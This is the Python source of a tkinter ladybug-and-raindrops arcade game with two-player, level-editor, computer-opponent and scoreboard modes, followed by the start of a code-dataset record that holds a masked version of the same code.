random.choice(data.sides) if side == "l": data.scaryBug.append(ScaryBug(140,750)) data.scaryBug.append(ScaryBug(540,750)) elif side =="r": data.scaryBug.append(ScaryBug(344,750)) data.scaryBug.append(ScaryBug(755,750)) def twoPlayerKeyPressed(event,data): # controllers for both bugs if event.keysym == "r": init(data) if data.winner==None: if (event.keysym == "a") and data.onLeft1==False: data.onLeft1 = True data.player1X = 150 if(event.keysym == "d") and data.onLeft1== True: data.onLeft1 = False data.player1X = 330 if (event.keysym == "Left") and data.onLeft2==False: data.onLeft2 = True data.player2X = 550 if(event.keysym == "Right") and data.onLeft2 == True: data.onLeft2 = False data.player2X = 750 def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y-=data.speed #<15 signifies that lady bug reached the top if data.player1Y < 15 and data.player2Y >15: data.winner= "player1" if data.player1Y>40: data.time +=1 drop2Player(data) data.player2Y-=data.speed if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2" if data.player2Y>40: data.time +=1 drop2Player(data) if data.player1Y < 15 and data.player2Y <15: data.winner = "tie" for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible:powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug:bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.start1 != None: # to make powerups only active for set amount of time if abs(data.start1-data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2-data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def 
twoPlayerRedrawAll(canvas, data): #magic #s for placement on screen canvas.create_image(data.width/4, data.height/2, image=data.halfBackground) canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground) canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10) canvas.create_line(0,20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50,40, text = "Player 1",font = "Arial 15 bold", fill = "yellow") canvas.create_text(450,40, text = "Player 2",font = "Arial 15 bold", fill = "yellow") winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner== "player1": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it! Player 1", font = "Arial 23 bold", fill = "yellow") elif data.winner== "player2": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it! Player 2", font = "Arial 23 bold", fill = "yellow") elif data.winner== "tie": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "Tie! 
You Both Made it!", font = "Arial 23 bold", fill = "yellow") #################################### # editor mode #################################### def editorKeyPressed(event,data): if event.keysym == "r": init(data) def editorMousePressed(event, data): #check for click on button for your speed checkHome(event, data) if data.easyY-data.r<= event.y <= data.easyY +data.r: if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r: data.yourSpeed = "slow" data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.yourSpeed = "medium" data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r: data.yourSpeed = "fast" data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): #check for click on button for rain speed if data.medX-data.r<= event.y <= data.medX + data.r: if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r: data.rainSpeed = "drizzle" data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.rainSpeed = "rain" data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r: data.rainSpeed = "thunderstorm" data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick def checkLast(event, data): #check for click on button for powerups if data.last-data.r<=event.y<= data.last+data.r: if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r: data.powerUpsEditor = True data.yes, data.no = data.click, data.notClick if data.last-2*data.r<= event.x<=data.last+2*data.r: data.powerUpsEditor = False data.no, data.yes = data.click, data.notClick if data.enter == data.click: if data.enterX-data.r<=event.y<=data.enterX+data.r: if data.medX-2*data.r<= 
event.x<=data.medX+2*data.r: data.mode="levelCreated" def drawButtons(canvas, data): #makes each button data.font, data.fill = "Helvetica 13 bold", "yellow" canvas.create_text(data.medX,data.YST, text= "Your Speed:", font = data.font,fill =data.fill) canvas.create_image(data.easyX,data.easyY, image = data.slow) canvas.create_text(data.easyX,data.easyY, text="Slow", font = data.font) canvas.create_image(data.medX,data.easyY, image = data.medium) canvas.create_text(data.medX,data.easyY, text="Medium", font = data.font) canvas.create_image(data.hardX,data.easyY, image = data.fast) canvas.create_text(data.hardX,data.easyY, text="Fast",font = data.font) canvas.create_image(data.easyX,data.medX, image = data.drizzle) canvas.create_text(data.medX,data.RST, text= "Rain Speed:", font = data.font,fill =data.fill) canvas.create_text(data.easyX,data.medX, text="Drizzle",font = data.font) canvas.create_image(data.medX,data.medX, image = data.rain) canvas.create_text(data.medX,data.medX, text="Rain",font = data.font) canvas.create_image(data.hardX,data.medX, image = data.thunderstorm) canvas.create_text(data.hardX,data.medX, text="Heavy",font = data.font) canvas.create_text(data.medX,data.PUT, text= "PowerUps?", font = data.font,fill =data.fill) canvas.create_image(data.easyY,data.last, image = data.yes) canvas.create_text(data.easyY,data.last, text="Yes",font = data.font) canvas.create_image(data.last,data.last, image = data.no) canvas.create_text(data.last,data.last, text="No",font = data.font) changeEnter(canvas, data) def changeEnter(canvas, data): #makes it so the enter button respond to click if data.powerUpsEditor != None and data.yourSpeed != None and \ data.rainSpeed != None: data.enter = data.click canvas.create_image(data.medX,data.enterX, image = data.enter) canvas.create_text(data.medX,data.enterX, text="Enter",font = data.font) def editorTimerFired(data): data.editorTime += 1 if data.editorTime %2 ==0: rainDrop(data) for drop in data.editorDrops: 
drop.onTimerFired(data) def rainDrop(data): #background drops xPosition = random.randint(0,data.width) data.editorDrops.append(Coconuts(xPosition,0)) def editorRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_image(data.width/2, data.height/2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width/2, data.S_P -10, text = "Edit Your Level!", font="Arial 23 bold", fill = "yellow") drawButtons(canvas, data) drawHome(canvas, data) #################################### # levelCreated mode #################################### def setEverything(data): #customizing game if data.yourSpeed == "slow": data.speed = 6 elif data.yourSpeed == "medium": data.speed = 10 elif data.yourSpeed == "fast": data.speed = 14 if data.rainSpeed == "thunderstorm": data.rSpeed = 7 elif data.rainSpeed == "rain": data.rSpeed = 10 elif data.rainSpeed == "drizzle": data.rSpeed = 13 def levelCoconutShot(data): #adding drops if data.levelEditorLives >0: if data.time%int(0.35*data.rSpeed) == 0: xPosition1 = random.randint(0,data.Player1Min-data.buffer) xPosition2 = random.randint(770, 870) xPosition3 = random.randint(220,770) data.coconuts.append(Coconuts(xPosition3,0)) data.coconuts.append(Coconuts(xPosition1,0)) data.coconuts.append(Coconuts(xPosition2,0)) if data.time % int(0.55*data.rSpeed) ==0: xPosition3 = random.randint(0, 220) xPosition5 = random.randint(220,770) data.coconuts.append(Coconuts(xPosition3,0)) data.coconuts.append(Coconuts(xPosition5,0)) if data.time % int(data.rSpeed) ==0: side = random.choice(data.sides) if side == "l": data.coconuts.append(Coconuts(3*data.width/8-20,0)) elif side =="r": data.coconuts.append(Coconuts(7*data.width/8+40,0)) xPosition4= random.randint(220,770) data.coconuts.append(Coconuts(xPosition4,0)) levelPowerUp(data) def levelPowerUp(data): # adding power-ups only if clicked yes if data.powerUpsEditor == True: if data.time % 20 == 0 and data.time%40 !=0: 
Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position,0)) if data.time%30 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position,0)) if data.time %35==0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position,750)) def levelCreatedKeyPressed(event,data): if event.keysym == "r": init(data) if data.levelEditorLives>0: if (event.keysym == "Left") and data.cx>=317: data.cx -=(data.lane/2) elif(event.keysym == "Right") and data.cx<=740: data.cx +=(data.lane/2) def levelCreatedMousePressed(event, data): checkHome(event, data) def levelCreatedTimerFired(data): setEverything(data) if data.levelEditorLives>0: data.cy-=data.speed if data.cy < 15: data.level +=1 if data.cy>40: data.time +=1 if data.pauseDrops !=True: levelCoconutShot(data) if data.powerUpsEditor == False: for coconut in data.coconuts: coconut.onTimerFired(data) hit(data) if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False:coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: #to make powerups only active for set amount of time if abs(data.start-data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False def levelCreatedRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_line(0,20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) if data.powerUpsEditor == True: drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width/6,100, text ="Total Lives: %d" %data.levelEditorLives, font = "Arial 20 bold", fill = "yellow") canvas.create_text(data.width/2,660, text ="""You lose a life for hitting a drop & don't get 
eaten!""", font = "Arial 15 bold", fill = "yellow") if data.levelEditorLives <=0: canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.deadScreen) canvas.create_text(data.width/2,data.height/4, text = "You Lose! Better Luck Next Time!", font = "Helvetica 23 bold", fill = "yellow") if data.level > 1: winEditor(canvas, data) drawHome(canvas, data) def winEditor(canvas, data): #screen for when you win canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it!", font = "Arial 23 bold", fill = "yellow") #################################### # AI Difficulty Mode #################################### def difficultyKeyPressed(event,data): if event.keysym == "r": init(data) def drawDifficulties(canvas, data): canvas.create_text(data.medX,data.AITY, text= "Computer Difficulty:", font="Arial 23 bold", fill = "yellow") canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX,data.easyY, text="Easy") canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX,data.easyY, text="Medium") canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX,data.easyY, text="Hard") if data.difficulty !=None: data.enter = data.click canvas.create_image(data.medX, data.enterY, image=data.enter) canvas.create_text(data.medX,data.enterY, text="Enter") def difficultyMousePressed(event, data): #sets up buttons to customize checkHome(event, data) if data.easyY-data.r<= event.y <= data.easyY +data.r: if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.difficulty = data.difM 
data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY-data.r<=event.y<=data.enterY+data.r: if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.mode="AI" def difficultyTimerFired(data): # makes normal background rain data.editorTime += 1 if data.editorTime %2 ==0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0,data.width) data.editorDrops.append(Coconuts(xPosition,0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_image(data.width/2, data.height/2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) #################################### # AI mode #################################### def hitAI1(data, distance): for coconut in data.coconutsAI1: # so AI switches by itself if (data.player1Y-data.r - coconut.y<=distance) and \ data.switchOnProgress == False: if coconut.x>=data.player1X-data.r and \ coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True: testInt = random.randint(0,9) # to have different levels of difficulty if testInt<= data.difficulty: data.switchOnProgress= True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress= False if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r: if coconut.x>=data.player1X-data.r and \ coconut.x<=data.player1X+data.r: data.player1Y+=50 data.coconutsAI1.remove(coconut) def AISwitchBug(data, distance): #AI to move for spider for scaryBug in data.scaryBug: if (data.player1Y-data.r - scaryBug.y<=distance) and \ data.switchOnProgress == False: if scaryBug.x>=data.player1X-data.r and \ scaryBug.x<=data.player1X+data.r: 
return True def hitAI2(data, distance): # check if human controlled player hits drops for coconut in data.coconutsAI2: if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r: if coconut.x>=data.player2X-data.r and \ coconut.x<=data.player2X+data.r: data.player2Y+=50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner ==None: # randomize position of drops off of tree if data.time%15==0: xPosition1 = random.randint(0,385) if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 +410,0)) if data.time%8 ==0: xPosition2 = random.randint(0,80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2,0)) data.coconutsAI1.append(Coconuts(xPosition3,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2+410,0)) data.coconutsAI2.append(Coconuts(xPosition3+410,0)) addExtraCoconut(data) addPowerUpsAI(data) def addExtraCoconut(data): #adds drops to edges of trees if data.time % (18) ==0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(140,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(540,0)) elif side =="r": if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(344,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(755,0)) if data.time % 37 == 0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: data.powerUps.append(PowerUps(140,0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(550,0)) elif side =="r": if data.pause1Drop != True: data.powerUps.append(PowerUps(344,0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755,0)) def addPowerUpsAI(data): #randomly add powerups on tree if data.time%33 == 0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: 
data.invincible.append(Invincible(140,0)) if data.pause2Drop != True: data.invincible.append(Invincible(550,0)) elif side =="r": if data.pause1Drop != True: data.invincible.append(Invincible(344,0)) if data.pause2Drop != True: data.invincible.append(Invincible(755,0)) if data.time %66==0: side = random.choice(data.sides) if side == "l": data.scaryBug.append(ScaryBug(140,750)) data.scaryBug.append(ScaryBug(550,750)) elif side =="r": data.scaryBug.append(ScaryBug(344,750)) data.scaryBug.append(ScaryBug(750,750)) def AIKeyPressed(event,data): if event.keysym == "r": init(data) if data.winner==None: if (event.keysym == "Left") and data.onLeft1==False: data.onLeft1 = True data.player2X = 550 elif(event.keysym == "Right") and data.onLeft1== True: data.onLeft1 = False data.player2X = 750 def AIMousePressed(event, data): checkHome(event, data) def AITimerFired(data): if data.winner == None: #want to check hit twice (before & after elements move) if data.Invincible1 == False:hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False:hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False:coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False:coconut.onTimerFired(data) # second check if data.Invincible1 == False:hitAI1(data,13) if data.Invincible2 == True:pass elif data.Invincible2 == False:hitAI2(data,13) data.player1Y-=data.speedAI #establishing winer if data.player1Y < 15 and data.player2Y >15: data.winner= "player1" if data.player1Y>40: data.time +=1 coconutShotAI(data) data.player2Y-=data.speedAI if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2" if data.player2Y>40: data.time +=1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y <15: data.winner = "tie" for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) def powerUpAITimerFired(data): #moves both sides symmetrically for powerUp in data.invincible: 
powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) if data.start1 != None: if abs(data.start1-data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2-data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def AIRedrawAll(canvas, data): canvas.create_image(data.width/4, data.height/2, image=data.halfBackground) canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground) canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10) canvas.create_line(0,20, data.width, 20) for coconut in data.coconutsAI1: coconut.draw(canvas) for coconut in data.coconutsAI2: coconut.draw(canvas) canvas.create_text(50,40, text = "Computer",font = "Arial 15 bold", fill = "yellow") canvas.create_text(450,40, text = "Player 1",font = "Arial 15 bold", fill = "yellow") drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) AIWinner(canvas, data) drawHome(canvas, data) def AIWinner(canvas, data): if data.winner== "player1": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "The Computer Won :(", font = "Arial 23 bold", fill = "yellow") elif data.winner== "player2": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it! 
You Won!", font = "Arial 23 bold", fill = "yellow") elif data.winner== "tie": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "Tie! You Both Made it!", font = "Arial 23 bold", fill = "yellow") #################################### # ScoreBoard mode #################################### def scoreboardKeyPressed(event, data): if event.keysym == "r": init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_image(data.width/2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width/2, data.txtTScore, text="Top Scores!", font = "Arial 30 bold", fill = "yellow") canvas.create_text(data.width/2, data.S_P, text="Score_Player", font = "Arial 20 bold", fill = "yellow") drawHome(canvas, data) #reads file data.savedScores data.savedScores=readFile("score.txt") score=data.savedScores.splitlines() scores=[] for line in score: scores.append(line.split(",")) #sorts scores to find top 5 scores = sorted(scores, key = lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width/2, data.scoreShift+(i*50), text = top5[i], font = "Arial 18 bold", fill = "yellow") #################################### # help mode #################################### def helpKeyPressed(event, data): if event.keysym == "r": init(data) def helpMousePressed(event, data): checkHome(event, data) def helpTimerFired(data): difficultyTimerFired(data) def helpRedrawAll(canvas, data): canvas.create_image(data.width/2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) 
#######################################
# use the run function as-is from notes
#######################################

def run(width=15000, height=25000):
    """Create the Tk window, wire up event handlers, and start the loop."""

    def repaint(canvas, data):
        # Clear and redraw everything after each event or timer tick.
        canvas.delete(ALL)
        redrawAll(canvas, data)
        canvas.update()

    def on_mouse(event, canvas, data):
        mousePressed(event, data)
        repaint(canvas, data)

    def on_key(event, canvas, data):
        keyPressed(event, data)
        repaint(canvas, data)

    def on_timer(canvas, data):
        timerFired(data)
        repaint(canvas, data)
        # pause, then call timerFired again
        canvas.after(data.timerDelay, on_timer, canvas, data)

    # Set up the shared mutable state object and call init
    class Struct(object):
        pass

    data = Struct()
    data.width = width
    data.height = height
    data.timerDelay = 100  # milliseconds

    # create the root and the canvas
    root = Tk()
    init(data)
    canvas = Canvas(root, width=data.width, height=data.height)
    canvas.pack()

    # set up events
    root.bind("<Button-1>", lambda event: on_mouse(event, canvas, data))
    root.bind("<Key>", lambda event: on_key(event, canvas, data))
    on_timer(canvas, data)

    # and launch the app
    root.mainloop()  # blocks until window is closed
    print("bye!")

run(1000, 1000)
flexible
{ "blob_id": "c893095be88636e6cb06eb3b939d8106fbb7a8ca", "index": 470, "step-1": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef 
init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\n<mask token>\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\n<mask token>\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) 
Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, 
data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + 
